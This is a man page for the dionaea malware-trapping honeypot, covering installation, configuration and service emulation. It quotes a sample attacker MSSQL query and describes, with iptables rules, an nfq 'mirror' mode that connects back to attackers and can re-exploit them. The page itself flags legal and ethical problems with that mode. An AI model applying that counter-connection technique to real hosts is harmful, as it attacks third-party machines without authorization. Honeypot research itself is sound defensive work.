1DIONAEA(1)                          dionaea                         DIONAEA(1)
2
3
4

NAME

6       dionaea - dionaea Documentation
7
8       Dionaea  is  meant  to  be  a  nepenthes successor, embedding python as
9       scripting language, using libemu to detect shellcodes, supporting  ipv6
10       and tls
11
12       WARNING:
13          The documentation is work in progress.
14
15       Content:
16

INTRODUCTION

18   How it works
19       dionaea intention is to trap malware exploiting vulnerabilities exposed
20       by services offerd to a network, the ultimate goal is gaining a copy of
21       the malware.
22
23   Security
24       As  Software  is likely to have bugs, bugs in software offering network
25       services can be exploitable, and dionaea is software  offering  network
26       services, it is likely dionaea has exploitable bugs.
27
28       Of  course  we  try  to  avoid it, but if nobody would fail when trying
29       hard, we would not need software such as dionaea.
30
31       So, in order to minimize the impact, dionaea can drop  privileges,  and
32       chroot.
33
34       To be able to run certain actions which require privileges, after dion‐
35       aea dropped them, dionaea creates a child process at startup, and  asks
36       the  child  process  to  run actions which require elevated privileges.
37       This does not guarantee anything, but it should be harder to  get  gain
38       root  access  to the system from an unprivileged user in a chroot envi‐
39       ronment.
40
41   Network Connectivity
42       Given the softwares intented use, network io is crucial. All network io
43       is  within  the  main  process  in  a so called non-blocking manner. To
44       understand nonblocking, imagine you have many pipes infront of you, and
45       these  pipes can send you something, and you can put something into the
46       pipe. If you want to put something into a pipe, while  it  is  crowded,
47       you’d have to wait, if you want to get something from a pipe, and there
48       is nothing, you’d have to wait too. Doing this pipe  game  non-blocking
49       means  you  won’t  wait  for the pipes to be write/readable, you’ll get
50       something off the pipes once data arrives, and write once the  pipe  is
51       not  crowded.  If  you want to write a large chunk to the pipe, and the
52       pipe is crowded after a small piece, you note the rest of the chunk you
53       wanted to write, and wait for the pipe to get ready.
54
55       DNS  resolves  are done using libudns, which is a neat non-blocking dns
56       resolving library with support for AAAA records and chained cnames.  So
57       much about non-blocking.
58
59       dionaea uses libev to get notified once it can act on a socket, read or
60       write.
61
62       dionaea can offer services via tcp/udp and tls for IPv4 and  IPv6,  and
63       can  apply  rate  limiting and accounting limits per connections to tcp
64       and tls connections - if required.
65

INSTALLATION

67       At the time of writing the best choice to install dionaea on  a  server
68       is  to use Ubuntu 14.04, but below you can find how to install it (from
69       source) on other distributions/operating systems.
70
71   Basic stuff
72   Download the source code
73       You can download the source code from the release page or by using  the
74       git command.
75
76          git clone https://github.com/DinoTools/dionaea.git
77          cd  dionaea
78
79   Arch Linux
80       Packages for dionaea are available from the Arch User Repository (AUR).
81       Use a package manager like yaourt that can handle and install  packages
82       from the AUR.
83
84       Before you start install the required build tools.
85
86          $ yaourt -S base-devel
87
88       After the requirements have been installed successfully you can install
89       dionaea.  This will checkout the latest sources from  the  git  reposi‐
90       tory, run the build process and install the package.
91
92          $ yaourt -S dionaea-git
93
94       After the installation has been completed you may want to edit the con‐
95       fig file /etc/dionaea/dionaea.conf.  If everything looks fine the dion‐
96       aea service can bee started by using the following command.
97
98          $ sudo systemctl start dionaea
99
100       The  log  files  and  everything captured can be found in the directory
101       /var/lib/dionaea/.
102
103   Ubuntu 16.04
104   From Source
105       Before you start download the source code of dionaea.
106
107       Install required build dependencies  before  configuring  and  building
108       dionaea. (‘ttf-liberation’ required to ‘util/gnuplotsql.py’)
109
110          sudo apt-get install \
111              autoconf \
112              automake \
113              build-essential \
114              check \
115              cython3 \
116              libcurl4-openssl-dev \
117              libemu-dev \
118              libev-dev \
119              libglib2.0-dev \
120              libloudmouth1-dev \
121              libnetfilter-queue-dev \
122              libnl-3-dev \
123              libpcap-dev \
124              libssl-dev \
125              libtool \
126              libudns-dev \
127              python3 \
128              python3-dev \
129              python3-bson \
130              python3-yaml \
131              ttf-liberation
132
133       After  all  dependencies have been installed successfully run autreconf
134       to build or rebuild the build scripts.
135
136          autoreconf -vi
137
138       Run configure to configure the build scripts.
139
140          ./configure \
141              --disable-werror \
142              --prefix=/opt/dionaea \
143              --with-python=/usr/bin/python3 \
144              --with-cython-dir=/usr/bin \
145              --with-ev-include=/usr/include/ \
146              --with-ev-lib=/usr/lib \
147              --with-emu-lib=/usr/lib/libemu \
148              --with-emu-include=/usr/include \
149              --with-nl-include=/usr/include/libnl3 \
150              --with-nl-lib=/usr/lib
151
152       Now you should be able to run make to build and  run  make  install  to
153       install the honeypot.
154
155          make
156          sudo make install
157
158       The new honeypot can be found in the directory /opt/dionaea.
159
160   Ubuntu 14.04
161   Package based
162       Nightly  packages  are  provided  in  a Personal Package Archive (PPA).
163       Before you start you should update all packages to get the latest secu‐
164       rity updates.
165
166          $ sudo apt-get update
167          $ sudo apt-get dist-upgrade
168
169       First of all install the tools to easily manage PPA resources.
170
171          $ sudo apt-get install software-properties-common
172
173       After  the  required  tools have been installed you can add the PPA and
174       update the package cache.
175
176          $ sudo add-apt-repository ppa:honeynet/nightly
177          $ sudo apt-get update
178
179       If everything worked without any errors you should be able  to  install
180       the dionaea package.
181
182          $ sudo apt-get install dionaea
183
184       After the installation has been completed you may want to edit the con‐
185       fig file /etc/dionaea/dionaea.conf.  If everything looks fine the dion‐
186       aea service can bee started by using the following command.
187
188          $ sudo service dionaea start
189
190       The  log  files  can  be  found  in the directory /var/log/dionaea/ and
191       everything else captured and logged by the honeypot can be found in the
192       directory /var/lib/dionaea/.
193
194   From Source
195       Before you start download the source code of dionaea.
196
197       Install  required  build  dependencies  before configuring and building
198       dionaea.
199
200          $ sudo apt-get install \
201              autoconf \
202              automake \
203              build-essential \
204              check \
205              cython3 \
206              libcurl4-openssl-dev \
207              libemu-dev \
208              libev-dev \
209              libglib2.0-dev \
210              libloudmouth1-dev \
211              libnetfilter-queue-dev \
212              libnl-dev \
213              libpcap-dev \
214              libssl-dev \
215              libtool \
216              libudns-dev \
217              python3 \
218              python3-dev \
219              python3-bson \
220              python3-yaml
221
222       After all dependencies have been installed successfully  run  autreconf
223       to build or rebuild the build scripts.
224
225          autoreconf -vi
226
227       Run configure to configure the build scripts.
228
229          ./configure \
230              --disable-werror \
231              --prefix=/opt/dionaea \
232              --with-python=/usr/bin/python3 \
233              --with-cython-dir=/usr/bin \
234              --with-ev-include=/usr/include \
235              --with-ev-lib=/usr/lib \
236              --with-emu-lib=/usr/lib/libemu \
237              --with-emu-include=/usr/include \
238              --with-nl-include=/usr/include/libnl3 \
239              --with-nl-lib=/usr/lib
240
241       Now  you  should  be  able to run make to build and run make install to
242       install the honeypot.
243
244          make
245          sudo make install
246
247       The new honeypot can be found in the directory /opt/dionaea.
248
249   3rd-party packages
250       The packages below are 3rd party provided, which  is  appreciated.   If
251       you have compiled a package for your own distribution, just send me the
252       link or make a pull request.
253

CONFIGURATION

255       If you want to change the software, it is really  important  to  under‐
256       stand  how  it  works,  therefore please take the time to how it works.
257       dionaea.cfg is the main configuration file.  In the example  below  you
258       can see the default configuration.  dionaea.cfg.INDENT 0.0
259
260          [dionaea]
261          download.dir=/var/lib/dionaea/binaries/
262          modules=curl,python,nfq,emu,pcap
263          processors=filter_streamdumper,filter_emu
264
265          listen.mode=getifaddrs
266          # listen.addresses=127.0.0.1
267          # listen.interfaces=eth0,tap0
268
269          # Country
270          # ssl.default.c=GB
271          # Common Name/domain name
272          # ssl.default.cn=
273          # Organization
274          # ssl.default.o=
275          # Organizational Unit
276          # ssl.default.ou=
277
278          [logging]
279          default.filename=/var/log/dionaea/dionaea.log
280          default.levels=all
281          default.domains=*
282
283          errors.filename=/var/log/dionaea/dionaea-errors.log
284          errors.levels=warning,error
285          errors.domains=*
286
287          [processor.filter_emu]
288          name=filter
289          config.allow.0.protocols=smbd,epmapper,nfqmirrord,mssqld
290          next=emu
291
292          [processor.filter_streamdumper]
293          name=filter
294          config.allow.0.types=accept
295          config.allow.1.types=connect
296          config.allow.1.protocols=ftpctrl
297          config.deny.0.protocols=ftpdata,ftpdatacon,xmppclient
298          next=streamdumper
299
300          [processor.streamdumper]
301          name=streamdumper
302          config.path=/var/lib/dionaea/bistreams/%Y-%m-%d/
303
304          [processor.emu]
305          name=emu
306          config.limits.files=3
307          #512 * 1024
308          config.limits.filesize=524288
309          config.limits.sockets=3
310          config.limits.sustain=120
311          config.limits.idle=30
312          config.limits.listen=30
313          config.limits.cpu=120
314          #// 1024 * 1024 * 1024
315          config.limits.steps=1073741824
316
317          [module.nfq]
318          queue=2
319
320          [module.nl]
321          # set to yes in case you are interested in the mac address  of the remote (only works for lan)
322          lookup_ethernet_addr=no
323
324          [module.python]
325          imports=dionaea.log,dionaea.services,dionaea.ihandlers
326          sys_paths=default
327          service_configs=/etc/dionaea/services-enabled/*.yaml
328          ihandler_configs=/etc/dionaea/ihandlers-enabled/*.yaml
329
330          [module.pcap]
331          any.interface=any
332
333
334
335   dionaea
336       download.dir
337          Global download directory used by some ihandlers.
338
339       listen.mode:
340          There are basically three modes how dionaea can bind the services to
341          IP addresses.
342
343          ·
344
345            getifaddrs - auto
346                   This will get a list of all IP addresses of  all  available
347                   interfaces  and  bind  the services to each IP.  It is also
348                   possible to specify a list of interfaces to  use  by  using
349                   the listen.interfaces perameter.
350
351          ·
352
353            manual - your decision
354                   In  this  mode  you have to specify an additional parameter
355                   listen.addresses.  This is a comma  separated  list  of  IP
356                   addresses dionaea should bind the services to.
357
358          ·
359
360            nl, will require a list of interfaces
361                   You  have  to  specify a comma separated list of interfaces
362                   names with  the  listen.interfaces  parameter.   If  an  IP
363                   address is added to an interfaces or removed from an inter‐
364                   face dionaea will lunch or stop all services for this IP.
365
366       modules
367          Comma separated list of modules.
368
369       processors
370          Comma separated list of processors.
371
372       ssl.default.c
373          Two letter id of the Country.
374
375       ssl.default.cn
376          The Common Name/domain name of the generated SSL/TLS certificate.
377
378       ssl.default.o
379          The Organization name.
380
381       ssl.default.ou
382          The name of the Organizational Unit.
383
384   Logging
385       dionaea has a general application log.  This logs are ment to  be  used
386       for  debugging  and  to track errors.  It is not recommended to analyse
387       this files to track attacks.
388
389       filename
390          The filename of the logfile.
391
392       levels
393          Only log messages that match the specified log level get  logged  to
394          the logfile.
395
396          Available log levels:
397
398          · debug
399
400          · info
401
402          · warning
403
404          · error
405
406          · critical
407
408          · all = Special log level including all log levels
409
410          Examples: Log only messages with level warning and error.INDENT 0.0
411
412              errors.levels=warning,error
413          Log   all   log   messages  but  exclude  messages  with  log  level
414          debug.INDENT 0.0
415
416          errors.levels=all,-debug
417

domain

419          Only log messages in a specified domain.
420
421   Modules
422       Only modules specified by the modules value in the dionaea section  are
423       loaded during the start up.
424
425       Every  module  might have its own config section with additional config
426       parameters.  The section name consists of the  prefix  module  and  the
427       module name speratated by a dot(.).
428
429       See  the  module/index documentation to find more information on how to
430       configure the modules.
431
432   Processors
433       The specified processors will be used as an entry point in the process‐
434       ing  pipeline.   In  most  cases the initial processor will be a filter
435       processor <processor/filter>.  The next processor in  the  pipeline  is
436       specified by the next parameter.
437
438       See  the  processor/index documentation to find more information on how
439       to configure the processors.
440

RUNNING DIONAEA

442       The software has some flags you can provide at  startup,  the  -h  flag
443       shows the help, the -H includes the default values.
444
445          $ /opt/dionaea/bin/dionaea -H
446            -c, --config=FILE               use FILE as configuration file
447                                              Default value/behaviour: /opt/dionaea/etc/dionaea/dionaea.cfg
448            -D, --daemonize                 run as daemon
449            -g, --group=GROUP               switch to GROUP after startup (use with -u)
450                                              Default value/behaviour: keep current group
451            -G, --garbage=[collect|debug]   garbage collect,  usefull to debug memory leaks,
452                                            does NOT work with valgrind
453            -h, --help                      display help
454            -H, --large-help                display help with default values
455            -l, --log-levels=WHAT           which levels to log, valid values
456                                            all, debug, info, message, warning, critical, error
457                                            combine using ',', exclude with - prefix
458            -L, --log-domains=WHAT          which domains use * and ? wildcards, combine using ',',
459                                            exclude using -
460            -u, --user=USER                 switch to USER after startup
461                                              Default value/behaviour: keep current user
462            -p, --pid-file=FILE             write pid to file
463            -r, --chroot=DIR                chroot to DIR after startup
464                                              Default value/behaviour: don't chroot
465            -V, --version                   show version
466            -w, --workingdir=DIR            set the process' working dir to DIR
467                                              Default value/behaviour: /opt/dionaea
468
469          examples:
470              # dionaea -l all,-debug -L '*'
471              # dionaea -l all,-debug -L 'con*,py*'
472              # dionaea -u nobody -g nogroup -w /opt/dionaea -p /opt/dionaea/var/run/dionaea.pid
473

INTEGRATION

475       A  list  of  applications  and tools to collect information exported by
476       dionaea.
477
478   DTAG Community Honeypot Project
479       The DTAG Community Honeypot Project has been started in 2010 by a small
480       group  of  enthusiasts  of  the Deutsche Telekom.  They are maintaining
481       T-Pot a Multi-Honeypot Platform.  It is based on well established  hon‐
482       eypots including dionaea.
483
484       · Website: DTAG Community Honeypot Project
485
486       · Status: active
487
488   DionaeaFR
489       DionaeaFR is a web-frontend to display attack information.  It uses the
490       SQLite database provided by the log_sqlite ihandler.
491
492       · Website: DionaeaFR
493
494       · Status: unmaintained since 2014
495
496   DIY with log_json
497       You can use the log_json incident handler in combination  with  an  ELK
498       stack to collect, aggregate and visualize attack information.
499
500       · Website: ELK stack
501
502       · Status: active
503
504   Modern Honey Network(mhn)
505       A  tool  to  deploy  honeypots,  collect attack information and display
506       aggregated statistics.
507
508       · Website: Modern Honey Network
509
510       · Status: active, but deploys an pre 0.2(2014) version  of  dionaea  by
511         default.
512

MODULES

514       The  subsections  name  is  the  name of the module dionaea will try to
515       load, most modules got rather simplistic names, the  pcap  module  will
516       use  libpcap,  the  curl  module  libcurl,  the emu module libemu … The
517       python module is special, as the python module can load python scripts,
518       which offer services, and each services can have its own options.
519
520       List of available modules
521
522   curl
523       The  curl  module  is used to transfer files from and to servers, it is
524       used to download files via http as well as submitting files to 3rd par‐
525       ties.
526
527   emu
528       The  emu  module is used to detect, profile and - if required - execute
529       shellcode.
530
531   pcap
532       The pcap module uses the libpcap library to detect rejected  connection
533       attempts,  so  even  if  we  do not accept a connection, we can use the
534       information somebody wanted to connect there.
535
536   python
537       The python module allows using the python interpreter in  dionaea,  and
538       allows controlling some scripts dionaea uses
539

SERVICE

541       Network services speak a certain language, this language is called pro‐
542       tocol.  When we started deploying honeypots, you could trap worms  just
543       by  opening a single port, and wait for them to connect and send you an
544       url where you could download a copy of the worm.  The  service  getting
545       attacked was the backdoor of the bagle mailworm, and it did not require
546       and interaction.  Later on, the exploitations of real services got more
547       complex, and you had to reply something to the worm to fool him.  Nowa‐
548       days worms use API to access services, before  sending  their  payload.
549       To  allow easy adjustments to the procotol, dionaea implements the pro‐
550       tocols in python. There is a glue between the network  layer  which  is
551       done  in  the  c programming language and the embedded python scripting
552       language, which allows using the non-blocking  connections  in  python.
553       This has some benefits, for example we can use non-blocking tls connec‐
554       tions in python, and we even get rate limiting on them  (if  required),
555       where  pythons own io does not offer such things. On the other hand, it
556       is much more comfortable to implement protocols in  python  than  doing
557       the same in c.
558
559       List of available services
560
561   Black hole
562       The  black  hole  module  can be used to bind a service to a port.  The
563       service does not respond to any submitted data.  But the bistreams  can
564       be used to create new modules.
565
566   Example config
567       services/blackhole.yaml.INDENT 0.0
568
569          - name: blackhole
570            config:
571              services:
572                # Telnet
573                - port: 23
574                  protocol: tcp
575
576                # DNS
577                - port: 53
578                  protocol: udp
579                - port: 53
580                  protocol: tcp
581
582                # NTP
583                - port: 123
584                  protocol: udp
585
586
587   EPMAP
588   Example config
589       services/epmap.yaml.INDENT 0.0
590
591          - name: epmap
592
593
594   FTP
595       Dionaea  provives a basic ftp server on port 21, it can create directo‐
596       ries and upload and download files. From my own  experience  there  are
597       very  little automated attacks on ftp services and I’m yet to see some‐
598       thing interesting happening on port 21.
599
600   Example config
601       services/ftp.yaml.INDENT 0.0
602
603          - name: ftp
604            config:
605              root: /var/lib/dionaea/roots/ftp
606              response_messages:
607                welcome_msg: 220 DiskStation FTP server ready.
608
609
610   HTTP
611       Dionaea supports http on port 80 as well as https, but there is no code
612       making  use  of  the  data  gathered  on  these  ports.  For https, the
613       self-signed ssl certificate is created at startup.
614
615   Configure
616       Example configuration:
617
618          - name: http
619            config:
620              root = "var/dionaea/wwwroot"
621
622       default_headers
623          Default header fields are send if none of the other header  patterns
624          match.
625
626       global_headers
627          Global header fields are added to all response headers.
628
629       headers
630          List  of  header  fields  to  be  used in the response header.  Only
631          applied if filename_pattern, status_code  and  methods  match.   The
632          first match in the list is used.
633
634       max_request_size
635          Maximum size in kbytes of the request. 32768 = 32MB
636
637       root
638          The root directory so serve files from.
639
640   Example config
641       services/http.yaml.INDENT 0.0
642
643          - name: http
644            config:
645              root: "/var/lib/dionaea/roots/www"
646              ports:
647                - 80
648              ssl_ports:
649                - 443
650              max_request_size: 32768 # maximum size in kbytes of the request (32MB)
651              global_headers:
652                - ["Server", "nginx"]
653              headers:
654                - filename_pattern: ".*\\.php"
655                  headers:
656                    - ["Content-Type", "text/html; charset=utf-8"]
657                    - ["Content-Length", "{content_length}"]
658                    - ["Connection", "{connection}"]
659                    - ["X-Powered-By", "PHP/5.5.9-1ubuntu4.5"]
660              # soap_enabled: false
661              template:
662                # set to true to enable template processing
663                # this feature requires jinja2 template engine http://jinja.pocoo.org/
664                enabled: false
665                file_extension: .j2
666                path: "/var/lib/dionaea/share/python/http/template/nginx"
667                templates:
668                  autoindex:
669                    filename: autoindex.html.j2
670                  error_pages:
671                    - filename: error.html.j2
672                    # - filename: error/{code}.html.j2
673                # used to specify additional template values
674                values:
675                  # full_name: nginx/1.1
676
677
678   Additional examples
679       Set the Server response field.
680
681          - name: http
682            config:
683              global_headers:
684                - ["Server", "nginx"]
685
686       Define headers to use if the filename matches a pattern.
687
688          - name: http
689            config:
690              headers:
691                - filename_pattern: ".*\\.php"
692                  headers:
693                    - ["Content-Type", "text/html; charset=utf-8"]
694                    - ["Content-Length", "{content_length}"]
695                    - ["Connection", "{connection}"]
696                    - ["X-Powered-By", "PHP/5.5.9-1ubuntu4.5"]
697
698   Memache
699       Dionaea can emulate a very basic memcached server.
700
701   Configure
702   Example config
703       services/memcache.yaml.INDENT 0.0
704
705          - name: memcache
706
707
708   Mirror
709   Example config
710       services/mirror.yaml.INDENT 0.0
711
712          - name: mirror
713
714
715   MongoDB
716       This  module  add initial support to emulates a MongoDB server with the
717       dionaea honeypot.  At the moment it is very limited and the functional‐
718       ity might be improved in one of the next releases.
719
720   Requirements
721       · bson module for Python 3
722
723   Example config
724       services/mongo.yaml.INDENT 0.0
725
726          - name: mongo
727
728
729   MQTT
730   Example config
731       services/mqtt.yaml.INDENT 0.0
732
733          - name: mqtt
734
735
736   MSSQL
737       This  module  implements the Tabular Data Stream protocol which is used
738       by Microsoft SQL Server. It listens to tcp/1433 and allows  clients  to
739       login.  It  can  decode queries run on the database, but as there is no
740       database, dionaea can’t reply, and there is no  further  action.  Typi‐
741       cally we always get the same query:
742
743          exec sp_server_info 1 exec sp_server_info 2 exec sp_server_info 500 select 501,NULL,1 where 'a'='A' select 504,c.name,c.description,c.definition from master.dbo.syscharsets c,master.dbo.syscharsets c1,master.dbo.sysconfigures f where f.config=123 and f.value=c1.id and c1.csid=c.id set textsize 2147483647 set arithabort on
744
745       Refer              to              the              blog             <‐
746       http://carnivore.it/2010/09/11/mssql_attacks_examined> for more  infor‐
747       mation.  Patches would be appreciated.
748
749   Example config
750       services/mssql.yaml.INDENT 0.0
751
752          - name: mssql
753
754
755   MySQL
756       This  module  implements  the MySQL wire stream protocol - backed up by
757       sqlite as database. Please refer to  2011-05-15  Extending  Dionaea  <‐
758       http://carnivore.it/2011/05/15/extending_dionaea> for more information.
759
760   Example config
761       services/mysql.yaml.INDENT 0.0
762
763          - name: mysql
764            config:
765              databases:
766                information_schema:
767                  path: ":memory:"
768                # example how to extend this
769                # just provide a databasename and path to the database
770                # the database can be altered by attackers, so ... better use a copy
771          #      psn:
772          #        path: "/path/to/cc_info.sqlite"
773
774
775   nfq
776       The  python nfq script is the counterpart to the nfq module.  While the
777       nfq module interacts with the kernel, the nfq python script takes  care
778       of  the  required  steps  to start a new service on the ports.  nfq can
779       intercept incoming tcp connections during the tcp handshake giving your
780       honeypot  the  possibility  to  provide  service on ports which are not
781       served by default.
782
783       As dionaea can not predict which protocol will  be  spoken  on  unknown
784       ports,  neither  implement  the protocol by itself, it will connect the
785       attacking host on the same port, and use the attackers server side pro‐
786       tocol  implementation  to  reply to the client requests of the attacker
787       therefore dionaea can end up re?exploiting the attackers machine,  just
788       by sending him the exploit he sent us.
789
790       The  technique  is  a brainchild of Tillmann Werner, who used it within
791       his honeytrap <http://honeytrap.carnivore.it> honeypot.   Legal  bound‐
792       aries  to  such  behaviour may be different in each country, as well as
793       ethical boundaries for each individual.  From a technical point of view
794       it works, and gives good results.  Learning from the best, I decided to
795       adopt this technique for dionaea.  Besides the legal and ethical issues
796       with  this  approach,  there are some technical things which have to be
797       mentioned
798
799       port scanning
800          If your honeypot gets port scanned, it would open a service for each
801          port  scanned, in worst case you’d end up with offering 64k services
802          per ip scanned.  By default you’d run out of fds at about  870  ser‐
803          vices  offerd, and experience weird behaviour.  Therefore the impact
804          of port scanning has to be limited.  The kiss approach taken here is
805          a sliding window of throttle.window seconds size.  Each slot in this
806          sliding window represents a second, and we increment this  slot  for
807          each  connection we accept.  Before we accept a connection, we check
808          if the sum of all slots is below throttle.limits.total, else  we  do
809          not  create  a new service.  If the sum is below the limit, we check
810          if the current slot is below the slot limit too, if both are  given,
811          we  create  a new service.  If one of the condition fails, we do not
812          spawn a new service, and let nfqeueu process the packet.  There  are
813          two ways to process packets which got throttled:
814
815          · NF_ACCEPT  (=1), which will let the packet pass the kernel, and as
816            there is no service listening, the packet gets rejected.
817
818          · NF_DROP (=0), which will drop the packet in the kernel, the remote
819            does not get any answer to his SYN.
820
821          I  prefer NF_DROP, as port scanners such as nmap tend to limit their
822          scanning speed, once they notice packets get lost.
823
824       recursive-self-connecting
825          Assume some shellcode or download instructions makes dionaea to
826
827          · connect itself on a unbound port
828
829          · nfq intercepts the attempt
830
831          · spawns a service
832
833          · accepts the connection #1
834
835          · creates mirror connection for  connection  #1  by  connecting  the
836            remotehost (itself) on the same port #2
837
838          · accepts connection #2 as connection #3
839
840          · creates  mirror  connection  for  connection  #3 by connecting the
841            remotehost (itself) on the same port #4
842
843          · …
844
845          Such recursive loop, has to be avoided for obvious reasons.   There‐
846          fore  dionaea checks if the remote host connecting a nfq mirror is a
847          local address using ‘getifaddrs’ and drops local connections.
848
849       So much about the known problems and workarounds …
850
851       If you  read  that  far,  you  want  to  use  it  despite  the  techni‐
852       cal/legal/ethical problems.  So … You’ll need iptables, and you’ll have
853       to tell iptables to enqueue packets which would establish a new connec‐
854       tion.  I recommend something like this:
855
856          iptables -t mangle -A PREROUTING -i eth0 -p tcp -m socket -j ACCEPT
857          iptables -t mangle -A PREROUTING -i eth0 -p tcp --syn -m state --state NEW -j NFQUEUE --queue-num 5
858
859       Explanation:
860
861          1. ACCEPT all connections to existing services
862
863          2. enqueue all other packets to the NFQUEUE
864
865       If  you  have dionaea running on your NAT router, I recommend something
866       like:
867
868          iptables -t mangle -A PREROUTING -i ppp0 -p tcp -m socket -j ACCEPT
869          iptables -t mangle -A PREROUTING -i ppp0 -p tcp --syn -m state --state NEW -j MARK --set-mark 0x1
870          iptables -A INPUT -i ppp0 -m mark --mark 0x1 -j NFQUEUE
871
872       Explanation:
873
874          1. ACCEPT all connections to existing services in mangle::PREROUTING
875
876          2. MARK all other packets
877
878          3. if we see these marked packets on INPUT, queue them
879
880       Using something like:
881
882          iptables -A INPUT -p tcp --tcp-flags SYN,RST,ACK,FIN SYN -j NFQUEUE --queue-num 5
883
884       will enqueue /all/ SYN packets to the NFQUEUE, once  you  stop  dionaea
885       you will not even be able to connect to your ssh daemon.
886
887       Even if you add an exemption for ssh like:
888
889          iptables -A INPUT -i eth0 -p tcp --syn -m state --state NEW --destination-port ! 22 -j NFQUEUE
890
891       dionaea  will  try to create a new service for /every/ incoming connec‐
892       tion, even if there is a service running already.  As  it  is  easy  to
893       avoid  this, I recommend sticking with the recommendation.  Besides the
894       already mention throttle settings, there are various timeouts  for  the
895       nfq mirror service in the config.  You can control how long the service
896       will wait for new connections (/timeouts.server.listen/), and how  long
897       the mirror connection will be idle (/timeouts.client.idle/) and sustain
898       (/timeouts.client.sustain/).
899
900   PPTP
901   Example config
902       services/pptp.yaml.INDENT 0.0
903
904          - name: pptp
905            config:
906          # Cisco PIX
907          #    firmware_revision: 4608
908          #    hostname:
909          #    vendor_name: Cisco Systems
910
911          # DrayTek
912          #    firmware_revision: 1
913          #    hostname: Vigor
914          #    vendor_name: DrayTek
915
916          # Linux
917          #    firmware_revision: 1
918          #    hostname: local
919          #    vendor_name: linux
920
921          # Windows
922          #    firmware_revision: 0
923          #    hostname:
924          #    vendor_name: Microsoft
925
926          # MikroTik router
927          #    firmware_revision: 1
928          #    hostname: MikroTik
929          #    vendor_name: MikroTik
930
931
932   SIP (VoIP)
933       This is a VoIP module for the honeypot dionaea. The VoIP protocol  used
934       is SIP since it is the de facto standard for VoIP today. In contrast to
935       some other VoIP honeypots, this module doesn’t connect to  an  external
936       VoIP  registrar/server. It simply waits for incoming SIP messages (e.g.
937       OPTIONS or even INVITE), logs all data  as  honeypot  incidents  and/or
938       binary  data  dumps (RTP traffic), and reacts accordingly, for instance
939       by creating a SIP session including an RTP audio channel. As  sophisti‐
940       cated exploits within the SIP payload are not very common yet, the hon‐
941       eypot module doesn’t pass any code to dionaea’s code emulation  engine.
942       This  will  be implemented if we spot such malicious messages. The main
943       features of the VoIP module are:
944
945       · Support for most SIP requests (OPTIONS, INVITE, ACK, CANCEL, BYE)
946
947       · Support for multiple SIP sessions and RTP audio streams
948
949       · Record all RTP data (optional)
950
951       · Set custom SIP username and secret (password)
952
953       · Set custom useragent to mimic different phone models
954
955       · Uses dionaea’s incident system to log to SQL database
956
957   Personalities
958       A personality defines how to handle a request. At least  the  ‘default’
959       personality MUST exist. The following options are available per person‐
960       ality.
961
962       serve
963          A list of IP addresses to use this personality for.
964
965       handle
966          List of SIP methods to handle.
967
968   SIP Users
969       You can easily add, change or remove users by editing the  SQLite  file
970       specified  by  the ‘users = “”’ parameter in the config file. All users
971       are specified in the users table.
972
973       username
974          Specifies the name of the user. This value  is  treated  as  regular
975          expression.      See      Python:     Regular     Expressions     <‐
976          http://docs.python.org/py3k/library/re.html> for more information.
977
978       password
979          The password.
980
981       personality
982          The user is only available in  the  personality  specified  by  this
983          value. You can define a personality in the config file.
984
985       pickup_delay_min
986          This  is an integer value. Let the phone ring for at least this num‐
987          ber of seconds.
988
989       pickup_delay_max
990          This is an integer value. Maximum number of seconds to  wait  before
991          dionaea picks up the phone.
992
993       action
994          This value isn’t in use, yet.
995
996       sdp
997          The name of the SDP to use. See table ‘sdp’.
998
999   SDP
1000       All SDPs can be defined in the sdp table in the users database.
1001
1002       name
1003          Name of the SDP
1004
1005       sdp
1006          The value to use as SDP
1007
1008       The following values are available in the SDP definition.
1009
1010       {addrtype}
1011          Address type. (IP4 or IP6)
1012
1013       {unicast_address}
1014          RTP address
1015
1016       {audio_port}
1017          Dionaea audio port.
1018
1019       {video_port}
1020          Dionaea video port.
1021
1022       The following control parameters are available in the SDP definition.
1023
1024       [audio_port]…content…[/audio_port]
1025          The  content is only available in the output if the audio_port value
1026          is set.
1027
1028       [video_port]…content…[/video_port]
1029          The content is only available in the output if the video_port  value
1030          is set.
1031
1032       Example:
1033
1034          v=0
1035          o=- 1304279835 1 IN {addrtype} {unicast_address}
1036          s=SIP Session
1037          c=IN {addrtype} {unicast_address}
1038          t=0 0
1039          [audio_port]
1040          m=audio {audio_port} RTP/AVP 111 0 8 9 101 120
1041          a=sendrecv
1042          a=rtpmap:111 Speex/16000/1
1043          a=fmtp:111 sr=16000,mode=any
1044          a=rtpmap:0 PCMU/8000/1
1045          a=rtpmap:8 PCMA/8000/1
1046          a=rtpmap:9 G722/8000/1
1047          a=rtpmap:101 telephone-event/8000
1048          a=fmtp:101 0-16,32,36
1049          a=rtpmap:120 NSE/8000
1050          a=fmtp:120 192-193
1051          [/audio_port]
1052          [video_port]
1053          m=video {video_port} RTP/AVP 34 96 97
1054          c=IN {addrtype} {unicast_address}
1055          a=rtpmap:34 H263/90000
1056          a=fmtp:34 QCIF=2
1057          a=rtpmap:96 H263-1998/90000
1058          a=fmtp:96 QCIF=2
1059          a=rtpmap:97 H263-N800/90000
1060          [/video_port]
1061
1062   Example config
1063       services/sip.yaml.INDENT 0.0
1064
1065          - name: sip
1066            config:
1067              udp_ports:
1068                - 5060
1069              tcp_ports:
1070                - 5060
1071              tls_ports:
1072                - 5061
1073              users: "@LOCALESTATEDIR@/lib/dionaea/sipaccounts.sqlite"
1074              rtp:
1075                enable: true
1076                # how to dump the rtp stream
1077                # bistream = dump as bistream
1078                modes:
1079                  - bistream
1080                  - pcap
1081                pcap:
1082                  path: "var/dionaea/rtp/{personality}/%Y-%m-%d/"
1083                  filename: "%H:%M:%S_{remote_host}_{remote_port}_in.pcap"
1084              personalities:
1085                default:
1086                  domain: "localhost"
1087                  name: "softphone"
1088                  personality: "generic"
1089          #      next-server:
1090          #        domain: "my-domain"
1091          #        name: "my server"
1092          #        personality: "generic"
1093          #        serve: ["10.0.0.1"]
1094          #        default_sdp: "default"
1095          #        handle: ["REGISTER", "INVITE", "BYE", "CANCEL", "ACK"]
1096
1097              actions:
1098                bank-redirect:
1099                  do: "redirect"
1100                  params:
1101                play-hello:
1102                  do: "play"
1103                  params:
1104                    file: "var/dionaea/.../file.ext"
1105
1106
1107   SMB
1108       The main protocol offerd by dionaea is SMB. SMB has a decent history of
1109       remote exploitable bugs, and is a very popular target for worms.  dion‐
1110       aeas  SMB  implementation  makes  use  of an python3 adapted version of
1111       scapy. As scapys own version of SMB was pretty limited,  almost  every‐
1112       thing but the Field declarations had to be rewritten. The SMB emulation
1113       written   for    dionaea    is    used    by    the    mwcollectd    <‐
